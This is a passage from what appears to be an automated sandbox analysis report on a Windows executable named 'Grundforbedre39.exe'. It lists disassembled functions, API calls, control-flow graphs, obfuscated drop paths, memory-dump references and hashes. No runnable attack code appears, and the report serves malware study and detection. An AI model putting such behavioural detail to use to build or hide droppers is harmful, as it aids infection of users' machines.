                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven), ref: 004039CB
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                                                      • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A20
                                                                                      • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                      • API String ID: 606308-2142088247
                                                                                      • Opcode ID: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                                                                      • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                                                      • Opcode Fuzzy Hash: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                                                                      • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 10001C24
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 4227406936-0
                                                                                      • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                      • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040580B Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 689 40580b-405831 call 405ad6 692 405833-405845 DeleteFileW 689->692 693 40584a-405851 689->693 696 4059c7-4059cb 692->696 694 405853-405855 693->694 695 405864-405874 call 40601a 693->695 697 405975-40597a 694->697 698 40585b-40585e 694->698 702 405883-405884 call 405a1a 695->702 703 405876-405881 lstrcatW 695->703 697->696 701 40597c-40597f 697->701 698->695 698->697 704 405981-405987 701->704 705 405989-405991 call 40635d 701->705 706 405889-40588d 702->706 703->706 704->696 705->696 713 405993-4059a7 call 4059ce call 4057c3 705->713 709 405899-40589f lstrcatW 706->709 710 40588f-405897 706->710 712 4058a4-4058c0 lstrlenW FindFirstFileW 709->712 710->709 710->712 714 4058c6-4058ce 712->714 715 40596a-40596e 712->715 729 4059a9-4059ac 713->729 730 4059bf-4059c2 call 405179 713->730 718 4058d0-4058d8 714->718 719 4058ee-405902 call 40601a 714->719 715->697 717 405970 715->717 717->697 723 4058da-4058e2 718->723 724 40594d-40595d FindNextFileW 718->724 731 405904-40590c 719->731 732 405919-405924 call 4057c3 719->732 723->719 728 4058e4-4058ec 723->728 724->714 727 405963-405964 FindClose 724->727 727->715 728->719 728->724 729->704 733 4059ae-4059bd call 405179 call 405ebb 729->733 730->696 731->724 734 40590e-405917 call 40580b 731->734 742 405945-405948 call 405179 732->742 743 405926-405929 732->743 733->696 734->724 742->724 746 40592b-40593b call 405179 call 405ebb 743->746 747 40593d-405943 743->747 746->724 747->724
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                      • lstrcatW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,\*.*), ref: 0040587C
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                                                      • FindFirstFileW.KERNELBASE(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405964
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 2035342205-2542029870
                                                                                      • Opcode ID: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                                      • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                                                      • Opcode Fuzzy Hash: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                                      • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040635D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(75B23420,00425738,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00405B1F,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406374
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 0040635D
                                                                                      • 8WB, xrefs: 0040635E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: 8WB$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 2295610775-1340106231
                                                                                      • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                                      • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                                                      • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                                      • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004066E2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                                      • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                                                      • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                                      • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                                                      • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                                                                      • Opcode Fuzzy Hash: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                                                      • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403C06 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 184 403c06-403c18 185 403d59-403d68 184->185 186 403c1e-403c24 184->186 188 403db7-403dcc 185->188 189 403d6a-403db2 GetDlgItem * 2 call 4040de SetClassLongW call 40140b 185->189 186->185 187 403c2a-403c33 186->187 192 403c35-403c42 SetWindowPos 187->192 193 403c48-403c4b 187->193 190 403e0c-403e11 call 40412a 188->190 191 403dce-403dd1 188->191 189->188 203 403e16-403e31 190->203 195 403dd3-403dde call 401389 191->195 196 403e04-403e06 191->196 192->193 198 403c65-403c6b 193->198 199 403c4d-403c5f ShowWindow 193->199 195->196 217 403de0-403dff SendMessageW 195->217 196->190 202 4040ab 196->202 204 403c87-403c8a 198->204 205 403c6d-403c82 DestroyWindow 198->205 199->198 214 4040ad-4040b4 202->214 212 403e33-403e35 call 40140b 203->212 213 403e3a-403e40 203->213 209 403c8c-403c98 SetWindowLongW 204->209 210 403c9d-403ca3 204->210 207 404088-40408e 205->207 207->202 218 404090-404096 207->218 209->214 215 403d46-403d54 call 404145 210->215 216 403ca9-403cba GetDlgItem 210->216 212->213 220 403e46-403e51 213->220 221 404069-404082 DestroyWindow EndDialog 213->221 215->214 222 403cd9-403cdc 216->222 223 403cbc-403cd3 SendMessageW IsWindowEnabled 216->223 217->214 218->202 225 404098-4040a1 ShowWindow 218->225 220->221 226 403e57-403ea4 call 40603c call 4040de * 3 GetDlgItem 220->226 221->207 228 403ce1-403ce4 222->228 229 403cde-403cdf 222->229 223->202 223->222 225->202 254 403ea6-403eab 226->254 255 403eae-403eea ShowWindow KiUserCallbackDispatcher call 404100 EnableWindow 226->255 233 403cf2-403cf7 228->233 234 403ce6-403cec 228->234 232 403d0f-403d14 call 4040b7 229->232 232->215 237 403d2d-403d40 SendMessageW 233->237 239 403cf9-403cff 233->239 234->237 238 403cee-403cf0 234->238 237->215 238->232 242 403d01-403d07 call 40140b 239->242 243 403d16-403d1f call 40140b 239->243 252 403d0d 242->252 243->215 251 403d21-403d2b 243->251 251->252 252->232 254->255 258 403eec-403eed 255->258 259 403eef 255->259 260 403ef1-403f1f GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f21-403f32 SendMessageW 260->261 262 403f34 260->262 263 403f3a-403f78 call 404113 call 40601a lstrlenW call 40603c SetWindowTextW call 401389 261->263 262->263 263->203 272 403f7e-403f80 263->272 272->203 273 403f86-403f8a 272->273 274 403fa9-403fbd DestroyWindow 273->274 275 403f8c-403f92 273->275 274->207 276 403fc3-403ff0 CreateDialogParamW 274->276 275->202 277 403f98-403f9e 275->277 276->207 278 403ff6-40404d call 4040de GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 276->278 277->203 279 403fa4 277->279 278->202 284 40404f-404062 ShowWindow call 40412a 278->284 279->202 286 404067 284->286 286->207
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                                                      • ShowWindow.USER32(?), ref: 00403C5F
                                                                                      • DestroyWindow.USER32 ref: 00403C73
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403D79
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DEE
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                                                      • EnableWindow.USER32(?,?), ref: 00403EE2
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EF8
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                                                      • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F17
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: &B
                                                                                      • API String ID: 3282139019-3208460036
                                                                                      • Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                                                      • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                                                      • Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                                                      • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 360 402dee-402e3c GetTickCount GetModuleFileNameW call 405bef 363 402e48-402e76 call 40601a call 405a1a call 40601a GetFileSize 360->363 364 402e3e-402e43 360->364 372 402f63-402f71 call 402d8a 363->372 373 402e7c 363->373 365 403020-403024 364->365 380 402f73-402f76 372->380 381 402fc6-402fcb 372->381 375 402e81-402e98 373->375 376 402e9a 375->376 377 402e9c-402ea5 call 40320c 375->377 376->377 386 402eab-402eb2 377->386 387 402fcd-402fd5 call 402d8a 377->387 383 402f78-402f90 call 403222 call 40320c 380->383 384 402f9a-402fc4 GlobalAlloc call 403222 call 403027 380->384 381->365 383->381 406 402f92-402f98 383->406 384->381 411 402fd7-402fe8 384->411 390 402eb4-402ec8 call 405baa 386->390 391 402f2e-402f32 386->391 387->381 396 402f3c-402f42 390->396 409 402eca-402ed1 390->409 395 402f34-402f3b call 402d8a 391->395 391->396 395->396 402 402f51-402f5b 396->402 403 402f44-402f4e call 4064a5 396->403 402->375 410 402f61 402->410 403->402 406->381 406->384 409->396 413 402ed3-402eda 409->413 410->372 414 402ff0-402ff5 411->414 415 402fea 411->415 413->396 417 402edc-402ee3 413->417 416 402ff6-402ffc 414->416 415->414 416->416 418 402ffe-403019 SetFilePointer call 405baa 416->418 417->396 419 402ee5-402eec 417->419 422 40301e 418->422 419->396 421 402eee-402f0e 419->421 421->381 423 402f14-402f18 421->423 422->365 424 402f20-402f28 423->424 425 402f1a-402f1e 423->425 424->396 426 402f2a-402f2c 424->426 425->410 425->424 426->396
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Grundforbedre39.exe,00000400,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402E1B
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00405C15
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Grundforbedre39.exe,C:\Users\user\Desktop\Grundforbedre39.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00402E67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
